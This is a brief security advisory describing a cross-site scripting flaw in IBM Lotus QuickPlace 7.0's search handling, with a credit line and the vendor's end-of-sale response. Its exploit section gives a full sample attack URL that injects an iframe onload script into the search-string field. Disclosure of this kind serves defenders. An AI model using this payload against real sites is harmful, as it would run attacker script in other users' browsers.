|
|
|
|
| |
| IBM Lotus QuickPlace is "a business-ready, self-service work space expressly designed for team collaboration". A vulnerability in the way IBM Lotus QuickPlace handles incoming searches allows attackers to cause it to insert arbitrary HTML and/or JavaScript. |
| |
Credit:
The information has been provided by Nir Goldshlager (Avnet Israel).
|
| |
Vulnerable Systems:
* IBM Lotus QuickPlace version 7.0
Exploit:
The following is a sample attack string:
http://website/QuickPlace/leg/Main.nsf/h_Toc/$new/?EditDocument&Form=h_RemoteUI& PreSetFields=h_EditAction;h_New,h_SetReadScene;h_StdPageRead,h_SetEditScene; h_RemoteSearchResults,h_ReturnToPage;B4F8E49FCF2698BE862573F100705440,h_SetRemote; 1,h_SearchString;<iframe/ /onload=alert(/XSSByNirG/)></iframe,h_SearchAuthor; ,h_SearchDate;,h_SearchDateTypeString;,h_SearchOrder; ,h_SearchCount;15,h_SearchStart;0,h_SetErrorScene; h_RemoteError,h_SetEditCurrentScene;h_RemoteSearchResults,h_SetQuickBrowse; 1,h_SearchFolderScope;,h_SearchRoomScope;,h_SearchType;
Vendor response:
The product is no longer being sold, any active customer concerned about this vulnerability should contact IBM Lotus QuickPlace support.
|
|
|
|
|
|
|
|
|
|
